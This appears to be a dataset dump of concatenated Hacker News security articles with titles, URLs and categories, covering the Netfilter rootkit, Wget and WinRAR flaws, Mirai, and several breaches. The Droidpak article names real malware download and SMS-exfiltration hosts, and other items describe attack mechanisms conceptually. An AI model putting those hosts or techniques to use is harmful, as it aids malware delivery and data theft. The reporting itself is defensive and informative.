""Retliften,"" alluding to ""netfilter"" but spelled backwards, adding the malicious driver can intercept network traffic, add new root certificates, set a new proxy server, and modify internet settings without a user's consent. The rogue code signing was spotted by Karsten Hahn, a malware analyst at German cybersecurity company G Data, who shared additional details of the rootkit, including a dropper, which is used to deploy and install Netfilter on the system. Upon successful installation, the driver was found to establish connection with a C2 server to retrieve configuration information, which offered a number of functionalities such as IP redirection, among other capabilities to receive a root certificate and even self-update the malware. The oldest sample of Netfilter detected on VirusTotal dates back to March 17, 2021, Hahn said. Microsoft noted that the actor submitted the driver for certification through the Windows Hardware Compatibility Program (WHCP), and that the drivers were built by a third-party. The company has since suspended the account and reviewed its submissions for additional signs of malware. The Windows maker also stressed that the techniques employed in the attack occur post-exploitation, which necessitates that the adversary must have had previously gained administrative privileges so as to be able to install the driver during system startup or trick the user into doing it on their behalf. Additionally, Microsoft said it intends to refine its partner access policies as well as its validation and signing process to enhance protections further. ""The security landscape continues to rapidly evolve as threat actors find new and innovative methods to gain access to environments across a wide range of vectors,"" MSRC said, once again highlighting how the trust associated with signed drivers can be exploited by threat actors to facilitate large-scale software supply chain attacks. ",Malware CVE-2014-4877: Wget FTP Symlink Attack Vulnerability,https://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html,"The open-source Wget application which is most widely used on Linux and Unix systems for retrieving files from the web has found vulnerable to a critical flaw. GNU Wget is a command-line utility designed to retrieve files from the Web using HTTP, HTTPS, and FTP, the most widely used Internet protocols. Wget can be easily installed on any Unix-like system and has been ported to many environments, including Microsoft Windows, Mac OS X, OpenVMS, MorphOS and AmigaOS. When a recursive directory fetch over FTP server as the target, it would let an attacker ""create arbitrary files, directories or symbolic links"" due to a symlink flaw. IMPACT OF SYMLINK ATTACK ""It was found that wget was susceptible to a symlink attack which could create arbitrary files, directories or symbolic links and set their permissions when retrieving a directory recursively through FTP,"" developer Vasyl Kaigorodov wrote in a Red Hat Bugzilla comment. A remote unauthenticated malicious FTP server connected to the victim via wget would allow attackers to do anything they wanted. Wget could download and create or overwrite existing files within the context of the user running wget. The vulnerability was first reported to the GNU Wget project by HD Moore, chief research officer at Rapid7. and is publicly identified as CVE-2014-4877. The flaw is considered critical since wget is present on nearly every Linux server in the world, and is installable (although not by default) on OS X machines as well, so needs a patch as soon as possible. PATCH AVAILABLE ""This flaw can lead to remote code execution through system-level vectors such as cron and user-level vectors such as bash profile files and SSH authorized_keys,"" Moore wrote. The vulnerability has now been fixed by the Wget project in wget 1.16, which blocks the default setting that allowed the setting of local symlinks. ""Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch,"" Moore said. WORKAROUND AVAILABLE EXPLOIT ""This issue can be mitigated by ensuring that all invocations of wget in the mirror mode also specify --retr-symlinks command line option,"" wrote Tomas Hoger on the Bugzilla report. ""Doing so is equivalent to applying the upstream commit linked in comment 14, which changes the default for the retr-symlinks options from off/no to on/yes, preventing creation of symbolic links locally."" ""In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"" An exploit for the vulnerability is now available on the open-source Metasploit penetration testing Website, so that security researchers could test the bug. You can download the exploit from here. ",Vulnerability First Ever Windows Malware that can hack your Android Mobile,https://thehackernews.com/2014/01/first-ever-windows-malware-that-can_23.html,"Hey Android users! I am quite sure that you must be syncing your Smartphone with your PCs for transferring files and generating backup of your device. If your system is running a windows operating system, then it's a bad news for you. Researchers have discovered a new piece of windows malware that attempts to install mobile banking malware on Android devices while syncing. Last year in the month of February, Kaspersky Lab revealed an Android malware that could infect your computer when connected to Smartphone or tablets. Recently, Researchers at Symantec antivirus firm discovered another interesting windows malware called 'Trojan.Droidpak', that drops a malicious DLL in the computer system and then downloads a configuration file from the following remote server: https://xia2.dy[REMOVED]s-web.com/iconfig.txt The Windows Trojan then parses this configuration file and download a malicious APK (an Android application) from the following location on the infected computer. %Windir%\CrainingApkConfig\AV-cdk.apk To communicate with the mobile device a command line tool Android Debug Bridge (ADB) is required, that allows the malware to execute commands on Android devices connected to the infected computer. ADB is a legitimate tool and part of the official Android software development kit (SDK). In the next step, the trojan downloads all the necessary tools including Android Debug Bridge and the moment you connect an android device having USB debugging Mode enabled, it initiates the installation process and repeats it until it ensure that the connected device has been infected and install an app that will appear as a fake Google App Store. Such Windows Malware is first of its own kind, since attackers prefer to use the social engineering techniques to spread their fake malicious apps hosted on third-party app stores. The installed malware dubbed as ""Android.Fakebank.B"", able to intercept victim's SMS messages and then send them to the attacker's server located at: https://www.slmoney.co.kr[REMOVED] Anyway Relax, if you are not a Korean citizen, because the malicious APK actually looks for certain Korean online banking applications on the compromised device. If you want to protect your Mobile and system from such Malware attack, Please consider a few points while connecting to a windows based computer: Turn off USB debugging on your Android device, when you are not using it Avoid connecting your droid with public computers Only Install reputable security software Keep your System, Softwares and Antivirus up-to-date. Stay Safe! ",Malware Rule 41 — FBI Gets Expanded Power to Hack any Computer in the World,https://thehackernews.com/2016/11/fbi-rule-41-hacking.html,"Hacking multiple computers across the world just got easier for the United States intelligence and law enforcement agencies from today onwards. The changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the United States Department of Justice came into effect on Thursday, after an effort to block the changes failed on Wednesday. The change grants the FBI much greater powers to hack into multiple computers within the country, and perhaps anywhere in the world, with just a single warrant authorized by any US judge (even magistrate judges). Usually, magistrate judges only issue warrants for cases within their jurisdiction. That's the same the FBI did in its 2015 investigation into child pornography site Playpen, in which the agency hacked into some 8,700 computers across 120 different countries. The Supreme Court approved the changes to Rule 41 in April, allowing any U.S. judge to issue search warrants that give the FBI and law enforcement agencies authority to remotely hack computers in any jurisdiction, or even outside the United States. Democratic Senator Ron Wyden attempted three times to block changes to Rule 41 that potentially risks people using Tor, a VPN, or some other anonymizing software to hide their whereabouts, but the efforts were blocked by Republican Senator John Cornyn of Texas. The rule change should take effect on 1st December, today, barring surprises. On the one hand, privacy advocates and legal experts have described the rule change as the extensive expansion of extraterritorial surveillance power that will allow agencies like the FBI to carry out international hacking operations with a lot less of a hassle. On the other hand, the DOJ argued that the changes to the rule will help investigate modern internet criminals, allowing investigators access computers whose locations are ""concealed through technological means,"" like the Tor anonymity network or VPNs (Virtual Private Networks), and devices used in botnets that have become powerful cyber weapons. Assistant Attorney General Leslie Caldwell highlighted these concerns in a blog post published last week, saying if a criminal suspect is using Tor or VPN to hide its real location, it becomes tough for investigators to know his/her current location. ""So in those cases, the Rules do not clearly identify which court the investigators should bring their warrant application to,"" Caldwell said. But what would happen if the FBI hacks the botnet victims, rather than the perpetrators? Or what if the government abuses this power to target nation states? In a speech, Wyden said that the changes to Rule 41 amounted to ""one of the biggest mistakes in surveillance policy in years,"" giving federal investigators ""unprecedented authority to hack into Americans' personal phones, computers, and other devices,"" Reuters reports. Other critics worry that the changes to Rule 41 would give the FBI unfettered ability to hack innocent users whose electronic devices have been infected with botnet malware without their knowledge, or anyone who keeps their identities private online. To this concern, Caldwell argued that investigators accessing the devices of botnet victims ""would, typically, be done only to investigate the extent of the botnet,"" or in order to ""obtain information necessary to liberate victims' computers from the botnet."" Caldwell further argued that the rule change would not allow the FBI to conduct ""Mass Hacking;"" in fact, failing to implement the rule change ""would make it more difficult for law enforcement to combat mass hacking by actual criminals."" ",Malware Secure Messaging App 'Confide' Used by White House Staffers Found Vulnerable,https://thehackernews.com/2017/03/confide-secure-messenger.html,"The secure messaging app used by staffers in the White House and on Capitol Hill is not as secure as the company claims. Confide, the secure messaging app reportedly employed by President Donald Trump's aides to speak to each other in secret, promises ""military-grade end-to-end encryption"" to its users and claims that nobody can intercept and read chats that disappear after they are read. However, two separate research have raised a red flag about the claims made by the company. Security researchers at Seattle-based IOActive discovered multiple critical vulnerabilities in Confide after a recent audit of the version 1.4.2 of the app for Windows, Mac OS X, and Android. Confide Flaws Allow Altering of Secret Messages The critical flaws allowed attackers to: Impersonate friendly contacts by hijacking an account session or guessing a password, as the app failed to prevent brute-force attacks on account passwords. Spy on contact details of Confide users, including real names, email addresses, and phone numbers. Intercept a conversation and decrypt messages. Since the app's notification system didn't require any valid SSL server certificate to communicate, a man-in-the-middle attacker can potentially grab messages intended for a legitimate recipient. Alter the contents of a message or attachment in transit without first decrypting it. Send malformed messages that can crash, slow, or otherwise disrupt the application. Exploiting the weaknesses allowed the researchers to gain access to more than 7,000 account records created over the span of two days (between February 22 and 24), out of a database containing between 800,000 and 1 Million records. Flaw Exposed Details of a Trump Associate and Several DHS Employees Out of just that 2-day sample, the researchers were even able to find a Donald Trump associate and several employees from the Department of Homeland Security (DHS) who downloaded the Confide app. IOActive researchers Mike Davis, Ryan O'Horo, and Nick Achatz responsibly disclosed a total 11 separate issues in Confide to the app's developers, who responded immediately by patching the app. In addition to this, researchers from Quarkslab also showed off Confide exploits Wednesday after analyzing the app's code. The researchers discovered a series of design vulnerabilities in the Confide for iOS app, which could allow the company to read user messages, adding that the app didn't notify users when encryption keys were changed. Even, The Company Can Read Your Messages According to the researchers, ""Confide server can read your messages by performing a man-in-the-middle attack,"" and other security features of the app, such as message deletion and screenshot prevention, can also be defeated. ""The end-to-end encryption used in Confide is far from reaching state of the art,"" the researchers said. ""Building a secure instant messaging app is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning."" Quarkslab researchers said the company server could generate its own key pair, meaning that the company has the ability to transmit the public key to a client when requesting the public key of a recipient. ""This client then unknowingly encrypts a message that can be decrypted by the server,"" the researchers added. ""Finally, when the server sends the message to the recipient, it is able to re-encrypt the message with its own key for the actual recipient."" In response to Quarkslab's findings, Confide co-founder and president Jon Brod said: ""The researchers intentionally undermined the security of their own system to bypass several layers of Confide's protection, including application signatures, code obfuscation, and certificate pinning. The attack that they claim to be demonstrating does not apply to legitimate users of Confide, who are benefiting from multiple security protections that we have put in place. Undermining your own security or taking complete control of a device makes the entire device vulnerable, not just the Confide app."" Confide has rolled out an updated version of its app which includes fixes for the critical issues, and assured its customers that there wasn't any incident of these flaws being exploited by any other party. Confide is one of those apps which, unlike other secure messaging apps, keeps its code private and until this time, offered little or no detail about the encryption protocols used in the app. For more details about the vulnerabilities in Confide, you can head on to IOActive's advisory and Quarkslab's Blog. ",Vulnerability Vulnerability found in Apple's iOS can hide malicious code inside apps,https://thehackernews.com/2013/08/vulnerability-found-in-apples-ios-can.html,"A Georgia Tech researcher has found a weakness in Apple's iOS mobile platform that could let hackers to hide malicious code inside apps and can be surreptitiously planted on the Apple App Store. Researchers team created a proof-of-concept attack that was published in the Apple App Store and used to remotely launch attacks on a controlled batch of devices, enabling them to post unauthorized tweets, take photos and even go after other apps. ""Our research shows that despite running inside the iOS sandbox, a Jekyll-based app can successfully perform many malicious tasks, such as posting tweets, taking photos, sending email and SMS, and even attacking other apps all without the user's knowledge."" Using a BeagleBoard, team created a USB malicious charger called Mactans that can install apps without user knowledge within a minute of being plugged in. In one demonstration, the attacker was able to hide the iPhone Facebook application and install a malicious copy in its place. The malware executed its task, then launched the legitimate hidden copy of Facebook, leaving the user none the wiser. Soon after the researchers reported the bug to Apple and they are fixing that flaw in iOS 7, that notifies users when they plug their mobile device into any peripheral that attempts to establish a data connection, and is working on ways to address the weaknesses revealed through Jekyll. ",Malware Patched WinRAR Bug Still Under Active Attack—Thanks to No Auto-Updates,https://thehackernews.com/2019/03/winrar-hacking-malware.html,"Various cyber criminal groups and individual hackers are still exploiting a recently patched critical code execution vulnerability in WinRAR, a popular Windows file compression application with 500 million users worldwide. Why? Because the WinRAR software doesn't have an auto-update feature, which, unfortunately, leaves millions of its users vulnerable to cyber attacks. The critical vulnerability (CVE-2018-20250) that was patched late last month by the WinRAR team with the release of WinRAR version 5.70 beta 1 impacts all prior versions of WinRAR released over the past 19 years. For those unaware, the vulnerability is ""Absolute Path Traversal"" bug that resides in the old third-party library UNACEV2.DLL of WinRAR and allows attackers to extract a compressed executable file from the ACE archive to one of the Windows Startup folders, where the malicious file would automatically run on the next reboot. Therefore, to successfully exploit this vulnerability and take full control over the targeted computers, all an attacker needs to do is just convincing users into opening a maliciously-crafted compressed archive file using WinRAR. Immediately after the details and proof-of-concept (PoC) exploit code went public, malicious attackers started exploiting the vulnerability in a malspam email campaign to install malware on users' computers running the vulnerable version of the software. Now, security researchers from McAfee reported that they identified more than ""100 unique exploits and counting"" in the first week since the vulnerability was publicly disclosed, with most of the initial targets residing in the United States. One recent campaign spotted by the researchers piggybacks on a bootlegged copy of an Ariana Grande's hit album, which is currently being detected as malware by only 11 security products, whereas 53 antivirus products fail to alert their users at the time of writing. The malicious RAR file (Ariana_Grande-thank_u,_next(2019)_[320].rar) detected by McAfee extracts a list of harmless MP3 files to the victim's download folder but also drops a malicious EXE file to the startup folder, which has been designed to infect the targeted computer with malware. ""When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes,"" the researchers explain. ""User Access Control (UAC) is bypassed, so no alert is displayed to the user. The next time the system restarts, the malware is run."" Unfortunately, such campaigns are still ongoing, and the best way to protect yourself from such attacks is to update your system by installing the latest version of the WinRAR software as soon as possible and avoid opening files received from unknown sources. ",Vulnerability "uTorrent & BitTorrent Sites Hacked, Spread Security Shield Malware",https://thehackernews.com/2011/09/utorrent-bittorrent-sites-hacked-spread.html,"uTorrent & BitTorrent Sites Hacked, Spread Security Shield Malware Attackers hijacked two popular Torrent websites ""bittorrent.com and utorrent.com"" and tampered with their download mechanisms, causing visitors trying to obtain file-sharing software to instead receive malware. The site reported on its blog that the attack had occurred at around 04:20 Pacific Daylight Time (11:20 GMT) on Tuesday. Initially, the incursion was also thought to have affected the servers of the main BitTorrent site, but further investigation revealed this site had been unaffected by the attack. Once installed, Security Shield delivers false reports that a computer is infected with multiple pieces of malware and prompts the user for payment before claiming to disinfect the machine. The attack affected only users who downloaded and installed software from bittorrent.com and utorrent.com during the hour-and-fifty-minute window that the sites were compromised. Those who installed software previously are unaffected. ""We have completed preliminary testing of the malware. Upon installation, a program called 'Security Shield"" launches and pops up warnings that a virus has been detected. It then prompts a user for payment to remove the virus. "" experts write on the blog. It is very important to once more note that infected are only users who have downloaded the software between 4:20 a.m. and 6:10 a.m. Pacific time. If you have previously downloaded it - you can rest assured your software is clean. ",Malware Cyber attack hits Istanbul Airport passport control system,https://thehackernews.com/2013/07/Istanbul-airport-cyber-attack-virus.html,"The passport control system at Istanbul Ataturk Airport International departure terminal was under cyber attack on Friday, while another airport in the Turkish largest city was also affected. Passengers stood in lines for hours and plane departures were delayed, because cyberattack shutdown passport control systems at two facilities. Later Authorities has restored the systems. Few local media said that the passport control system at the Sabiha Gokcen International Airport in Istanbul also broke down due to the malfunction of the Istanbul provincial security directorate's Polnet data system. They believe that systems were infected using some malwares, But Authorities also investigating if the malware yielded user details from the infected machines or not. No claim of responsibility or blame was attributed to the alleged cyberattack. However, this is another malware attacks been reported, targeting vital infrastructure so far. Cybersecurity has emerged as an emerging threat to national security in the digital age. ",Cyber_Attack Human Rights organisation website Serves Gh0st RAT Trojan,https://thehackernews.com/2012/05/human-rights-organisation-website.html,"Human Rights organisation website Serves Gh0st RAT Trojan According to the company's Security Labs blog, Amnesty International's United Kingdom website was compromised and hosting the potent Gh0st RAT Trojan earlier this week. Malicious Java code was planted on the site in a bid to push the Gh0st RAT Trojan onto vulnerable Windows machines. If successful, the attack plants malware onto machines that is capable of extracting the user's files, email, passwords and other sensitive personal information. The vulnerability for the infection stemmed from a popular Java exploit, CVE-2012-050. Hackers exploited that hole and used it to inject the Amnesty International site's script with malicious code. The Java hole was the same used by Flashback, the much buzzed-about Mac OS X Trojan in recent months. The exploit code used in this attack appears to have been copied from Metasploit, an open source penetration testing framework popular among security professionals, Giuliani said. The injected web code was removed after Websense alerted Amnesty to the issue.The attack bears all the hallmarks of a series of attacks that appear to be targeting pro-Tibet organisations and sympathisers, most likely by a group connected to China. The Gh0st Trojan has been used by suspected Chinese hackers in several advanced persistent threat (APT) style attacks, most notably the 'Nitro' attacks against energy firms in 2011. Chinese involvement in the Amnesty International attack is suspected but unproven. Websense detected over 100 other websites infected with the same malicious code as Amnesty International's U.K. website during the same time period, Carl Leonard, senior manager of Websense Security Labs, said. ",Malware (Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild,https://thehackernews.com/2018/02/flash-zero-day-exploit.html,"Another reason to uninstall Adobe Flash Player—a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers. South Korea's Computer Emergency Response Team (KR-CERT) issued an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea. Simon Choi of South Korea-based cybersecurity firm Hauri first reported the campaign on Twitter, saying the North Korean hackers have been using the Flash zero-day against South Koreans since mid-November 2017. Although Choi did not share any malware sample or details about the vulnerability, the researcher said the attacks using the new Flash zero-day is aimed at South Korean individuals who focus on researching North Korea. Adobe also released an advisory on Wednesday, which said the zero-day is exploiting a critical 'use-after-free' vulnerability (CVE-2018-4878) in its Flash media software that leads to remote code execution. The critical vulnerability affects Adobe Flash Player version 28.0.0.137 and earlier versions for: Desktop Runtime (Win/Mac/Linux) Google Chrome (Win/Mac/Linux/Chrome OS) Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1) ""Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users,"" the advisory said. ""These attacks leverage Office documents with embedded malicious Flash content distributed via email. Adobe will address this vulnerability in a release planned for the week of February 5."" To exploit the vulnerability, all an attacker need to do is trick victims into opening Microsoft Office documents, web pages, or spam messages that contain a maliciously crafted Adobe Flash file. The vulnerability can be leveraged by hackers to take control of an affected computer. Choi also posted a screenshot to show that the Flash Player zero-day exploit has been delivered via malicious Microsoft Excel files. Adobe said in its advisory that the company has planned to address this vulnerability in a ""release planned for the week of February 5,"" through KR-CERT advises users to disable or completely remove the buggy software. ",Vulnerability "Friday's Massive DDoS Attack Came from Just 100,000 Hacked IoT Devices",https://thehackernews.com/2016/10/ddos-attack-mirai-iot.html,"Guess how many devices participated in last Friday's massive DDoS attack against DNS provider Dyn that caused vast internet outage? Just 100,000 devices. I did not miss any zeros. Dyn disclosed on Wednesday that a botnet of an estimated 100,000 internet-connected devices was hijacked to flood its systems with unwanted requests and close down the Internet for millions of users. Dyn executive vice president Scott Hilton has issued a statement, saying all compromised devices have been infected with a notorious Mirai malware that has the ability to take over cameras, DVRs, and routers. ""We're still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints,"" Hilton said. ""We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets."" Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks. A day after the attack, Dyn confirmed that a botnet of Mirai malware-infected devices had participated in its Friday's Distributed Denial of Service attacks. However, after an initial analysis of the junk traffic, just yesterday, the company revealed that it had identified an estimated 100,000 sources of malicious DDoS traffic, all originating from IoT devices compromised by the Mirai malware. Earlier the company believed that approximately ""tens of millions"" of IP addresses were responsible for the massive attack against its crucial systems, but the actual number came out to be much much less, leaving all of us wondering, as: How did the Attack Succeed to this Massive Level? To this, Hilton said that Domain Name System protocol itself has the ability to amplify requests from legitimate sources. ""For example, the impact of the attack generated a storm of legitimate retry activity as recursive servers attempted to refresh their caches, creating 10-20X normal traffic volume across a large number of IP addresses,"" Hilton said. ""When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume."" ""It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be."" Friday's cyber attack overwhelmed Dyn's central role in routing and managing Internet traffic, rendering hundreds of sites and services, including Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, inaccessible to Millions of people worldwide for several hours. Dyn did not disclose the actual size of the attack, but it has been speculated that the DDoS attack could be much bigger than the one that hit French Internet service and hosting provider OVH that peaked at 1.1 Tbps, which is the largest DDoS attack known to date. According to the company, this attack has opened up an important debate about Internet security and volatility. ""Not only has it highlighted vulnerabilities in the security of 'Internet of Things' (IOT) devices that need to be addressed, but it has also sparked further dialogue in the Internet infrastructure community about the future of the Internet,"" Hilton said. Next DDoS Attack could reach Tens Of Terabits-Per-Second If the IoT security is not taken seriously, the future DDoS attack could reach tens of terabits-per-second, as estimated by network security firm Corero. The DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size, following a discovery of a new zero-day attack vector that has the ability to amplify DDoS attacks by as much as 55x, Corero warned in a blog post published Tuesday. According to the security firm, this new attack vector uses the Lightweight Directory Access Protocol (LDAP), which if combined with an IoT botnet, could break records in DDoS power. Dave Larson of Corero explains: ""LDAP is not the first, and will not be the last, protocol or service to be exploited in this fashion. Novel amplification attacks like this occur because there are so many open services on the Internet that will respond to spoofed record queries. However, a lot of these attacks could be eased by proper service provider hygiene, by correctly identifying spoofed IP addresses before these requests are admitted to the network."" You can read more on Corero's official website. How to Protect your Smart Device from being Hacked 1. Change Default Passwords of your connected devices: If you have got any internet-connected device at home or work, change your credentials if it still uses default ones. Keep in mind; Mirai malware scans for default settings. 2. Disable Universal Plug-and-Play (UPnP): UPnP comes enabled by default in every IoT device, which creates a hole in your router's security, allowing malware to infiltrate any part of your local network. Check for ""Universal Plug and Play"" features and turn them OFF. 3. Disable Remote Management through Telnet: Go into your router's settings and disable remote management protocol, specifically through Telnet, as this is a protocol used for allowing one computer to control another from a remote location. It has also been used in previous Mirai attacks. 4. Check for Software Updates and Patches: last but not the least, always keep your connected devices and routers up-to-date with the latest vendor firmware. Check if your IoT device is vulnerable to Mirai malware There is an online tool called Bullguard's IoT Scanner that can help you check if any IoT device over your network is vulnerable to Mirai malware. If it detects any, contact the device's manufacturer or lookout for a solution to patch those vulnerable gaps. The tool makes use of the vulnerability scanning service Shodan for finding unprotected computers and webcams on your home network that are exposed to the public and potentially accessible to hackers. ",Malware New Ransom malware infecting computers,https://thehackernews.com/2012/09/new-ransom-malware-infecting-computers.html,"The Metropolitan Police have issued an urgent warning about a new ransom malware that is in circulation. Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed. ""The ""malware"" infects personal computers after users have accessed certain websites. *(It should be noted that there are several similar designs currently in circulation)"" Ransomware typically propagates like a typical computer worm, entering a system through, for example, a downloaded file or a vulnerability in a network service. The program will then run a payload which will begin to encrypt personal files on the hard drive. More sophisticated ransomware may hybrid-encrypt the victim's plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key. Some ransomware payloads do not use encryption. In these cases, the payload is simply an application designed to effectively restrict interaction with the system, typically by overriding explorer.exe in the Windows registry as the default shell, or even modify the master boot record, not allowing the operating system to start at all until it is repaired. We request readers to share this article with your friends on all social networks to alert them that this is a fraud and users are advised not to pay out any monies or hand out any bank details. Police advice - ""We would advise anyone who has been deceived by such a message and parted with any money to report the offence to their local police by dialling ""101"" or your local police. Virus/Malware infections where no money has been lost can be logged at www.actionfraud.org.uk/report_fraud."" Modern ransomware attacks were initially popular within Russia, but in recent years there have been an increasing number of ransomware attacks targeted towards other countries, such as Australia, Germany, and the United States among others. In order to reduce the chances of being infected by this or similar malware we strongly recommend to use Some Best Antiviruses and never forget to update your software & potential vulnerabilities. Subscribe to The Hacker News Daily free Newsletter for Latest updates. ",Malware Binance Hacked — Hackers Stole Over $40 Million Worth Of Bitcoin,https://thehackernews.com/2019/05/binance-cryptocurrency-hacked.html,"Binance, one of the largest cryptocurrency exchanges in the world, confirmed today that the company lost nearly $41 million in Bitcoin in what appears to be its largest hack to date. In a statement, Binance's CEO Changpeng Zhao said the company discovered a ""large scale security breach"" earlier on May 7, as a result of which hackers were able to steal roughly 7000 bitcoins, which worth 40.6 million at the time of writing. News of the hack comes just hours after Zhao tweeted that Binance has ""to perform some unscheduled server maintenance that will impact deposits and withdrawals for a couple of hours."" According to the company, malicious attackers used a variety of attack techniques, including phishing and computer viruses, to carry out the intrusion and were able to breach a single BTC hot wallet (a cryptocurrency wallet that's connected to the Internet), which contained about 2% of the company's total BTC holdings, and withdraw stolen Bitcoins in a single transaction. What's more disturbing is that the company admitted the hackers managed to get their hands on user critical information, such as API keys, two-factor authentication codes, and potentially other information, which is required to log in to a Binance account. Zao also warned that ""hackers may still control certain user accounts and may use those to influence prices."" Fortunately, the Binance cold storage—the offline wallets where the majority of funds are kept—remain secure. Also, Internet-connected individual user wallets were not directly affected. ""All of our other wallets are secure and unharmed,"" the company said in a statement. ""The hackers had the patience to wait, and execute well-orchestrated actions through multiple seemingly independent accounts at the most opportune time."" ""The transaction is structured in a way that passed our existing security checks. It was unfortunate that we were not able to block this withdrawal before it was executed."" Binance has suspended all deposits and withdrawals on its platform for roughly one week while it thoroughly reviews the security and investigates the incident. Binance CEO said the company last year set up an internal insurance mechanism, called Secure Asset Fund for Users (SAFU), which will cover the entire amount of the hack and won't impact users. ""To protect the future interests of all users, Binance will create a Secure Asset Fund for Users (SAFU),"" Zhao said. ""Starting from 2018/07/14, we will allocate 10% of all trading fees received into SAFU to offer protection to our users and their funds in extreme cases. This fund will be stored in a separate cold wallet."" Binance CEO also said he would participate in a previously scheduled Twitter Ask-Me-Anything. ",Data_Breaches This Malware Can Delete and Replace Your Entire Chrome Browser with a lookalike,https://thehackernews.com/2015/10/malware-chome.html,"Security researchers have uncovered a new piece of Adware that replaces your entire browser with a dangerous copy of Google Chrome, in a way that you will not notice any difference while browsing. The new adware software, dubbed ""eFast Browser,"" works by installing and running itself in place of Google Chrome The adware does all kinds of malicious activities that we have seen quite often over the years: Generates pop-up, coupon, pop-under and other similar ads on your screen Placing other advertisements into your web pages Redirects you to malicious websites containing bogus contents Tracking your movements on the web to help nefarious marketers send more crap your way to generating revenue Therefore, having eFast Browser installed on your machine may lead to serious privacy issues or even identity theft. What's Nefariously Intriguing About this Adware? The thing that makes this Adware different from others is that instead of taking control over your browser, eFast Browser uses a deceiving method of replacing your entire browser with a malicious copy of Chrome. In a report published Malwarebytes detailed that the nefarious software attempts to delete Chrome and itself takes its place, allowing it to hijack several file associations including HTML, JPG, PDF, and GIF, as well as URLs associations including HTTP, HTTPS, and MAILTO. The eFast Browser is based on Google's Chromium open-source software, so the browser maintains the look and feel of Google Chrome at first glance, tricking users into believing that they are using the legitimate Chrome browser. The malicious software program then replaces any Chrome desktop website shortcuts with its own versions, showing a striking design resemblance with window and icons from Chrome. ""The installer for eFast also deletes all the shortcuts to Google Chrome on your taskbar and desktop,"" wrote Malwarebytes, ""most likely hoping to confuse the user with their very similar icons."" What's more? The eFast Browser is based on Google's Chromium open-source software, so the browser maintains the look and feel of Google Chrome at first glance, tricking users into believing that they are using the legitimate Chrome browser. The malicious computer program comes from a company calling itself Clara Labs, who developed a slew of similar browsers under titles such as BoBrowser, Unico, and Tortuga. How does eFast Browser Install itself in the First Place? eFast Browser is just another Potentially Unwanted Program (PUP), according to PCrisk, which tries to get itself on your PC by burrowing itself into the free software installers from dubious sources on the web. It's easier for malicious software to replace your browser than to infect it. This is due to Chrome's security against in-browser malware that cyber criminals are now overwriting the browser completely. It is relatively easy to avoid installing eFast Browser and, fortunately, also relatively easy to uninstall if you have found it on your computer. You can follow the removal instructions detailed by PCRisk. ",Malware Yahoo Admits 1 Billion Accounts Compromised in Newly Discovered Data Breach,https://thehackernews.com/2016/12/yahoo-data-breach-billion.html,"In what believe to be the largest data breach in history, Yahoo is reporting a massive data breach that disclosed personal details associated with more than 1 Billion user accounts in August 2013. …And it's separate from the one disclosed by Yahoo! in September, in which hackers compromised as many as 500 Million user accounts in late 2014. What's troubling is that the company has not been able to discovered how ""an unauthorized third party"" were able to steal the data associated with more than one Billion users. The data breach officially disclosed on Wednesday actually occurred in 2013 and, just like the one in 2014, allowed the cyber crooks to obtain personal information of its users but not credit card details. Here's what Yahoo's chief information security officer Bob Lord says the hackers obtained: ""The stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers."" The hashed passwords used an aging algorithm called MD5 that can easily be cracked. Moreover, in some incidents, the hack revealed unencrypted security questions and answers that would provide quick access to users accounts. The public disclosure of this latest data breach came upon ""further analysis"" of data that law enforcement provided Yahoo in November. Change your Password and Security Q&A Immediately Of course, if you are one of those potentially affected users, you are strongly recommended to change your passwords and invalidate affected security questions. Also, if you are using the same password and answers for security questions somewhere else, change them too. Yahoo has started notifying the account holders affected by the massive data breach, requiring them to change their passwords immediately. Both the data breaches at Yahoo! came after the company negotiated a deal to sell its core internet business to Verizon Communication Inc for $4.8 Billion. The September disclosure of half a billion users' breach prompted Verizon to say in October that it might withdraw from the agreement to buy Yahoo. Here's the statement from Verizon spokesman Bob Verettoni about the recent largest data breach: ""As we've said all along, we will evaluate the situation as Yahoo continues its investigation. We will review the impact of this new development before reaching any final conclusions."" Previous data breach news had already magnified company's problems, and now when another data breach affecting a Billion users has been disclosed, would Yahoo be able to save its acquisition deal? ",Data_Breaches Microsoft becomes latest victim of Cyber attack,https://thehackernews.com/2013/02/microsoft-becomes-latest-victim-of.html,"Microsoft has become the latest victim of to Cyber attack and confirm that small number of its computers, including some in its Mac software business unit, were infected with malware. Microsoft added, malicious software used in a cyber attack is very similar to those experienced by Facebook and Apple recently. Microsoft gave few other details about the break-in, ""We have no evidence of customer data being affected and our investigation is ongoing."" ""During our investigation, we found a small number of computers, including some in our Mac business unit that were infected by malicious software using techniques similar to those documented by other organizations. We have no evidence of customer data being affected and our investigation is ongoing,"" Microsoft said. ""This type of cyber attack is no surprise to Microsoft and other companies that must grapple with determined and persistent adversaries,"" the company said. Last week, Apple said its computers were attacked by the same hackers who targeted 